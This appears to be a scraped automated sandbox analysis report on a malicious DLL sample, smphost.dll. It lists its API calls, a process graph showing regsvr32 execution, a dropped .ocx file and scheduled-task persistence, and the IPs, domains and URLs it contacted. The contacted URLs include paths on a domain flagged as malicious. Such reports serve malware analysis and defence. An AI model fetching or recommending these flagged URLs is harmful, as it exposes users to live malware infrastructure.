Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E9658 cpuid 0_2_6E9E9658
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6E9E99A8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, 0_2_6E9E8630
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 562835 Sample: smphost.dll Startdate: 30/01/2022 Architecture: WINDOWS Score: 88 36 Antivirus detection for URL or domain 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Sigma detected: Schedule system process 2->40 42 3 other signatures 2->42 7 loaddll32.exe 1 2->7         started        9 regsvr32.exe 2->9         started        process3 process4 11 regsvr32.exe 8 7->11         started        16 cmd.exe 1 7->16         started        18 rundll32.exe 7->18         started        22 2 other processes 7->22 20 regsvr32.exe 9->20         started        dnsIp5 32 manageintel.com 185.14.31.158, 32710, 443, 49830 ITLDC-NLUA Ukraine 11->32 34 the.earth.li 93.93.131.124, 443, 49836, 49837 MYTHICMythicBeastsLtdGB United Kingdom 11->34 30 C:\ProgramData\6\5507.ocx, PE32 11->30 dropped 44 System process connects to network (likely due to code injection or exploit) 11->44 46 Uses schtasks.exe or at.exe to add and modify task schedules 11->46 24 WerFault.exe 23 9 11->24         started        26 schtasks.exe 11->26         started        28 rundll32.exe 16->28         started        file6 signatures7 process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.14.31.158
 manageintel.com Ukraine
21100 ITLDC-NLUA true
93.93.131.124
 the.earth.li United Kingdom
44684 MYTHICMythicBeastsLtdGB false

Contacted Domains

Name IP Active
manageintel.com 185.14.31.158 true
the.earth.li 93.93.131.124 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://manageintel.com/WUzZRUBQje/Auth.php true
  • Avira URL Cloud: malware
 unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml true
  • Avira URL Cloud: safe
 unknown
https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe false
    		high
    https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe false
      		high
      https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml true
      • Avira URL Cloud: safe
      		 unknown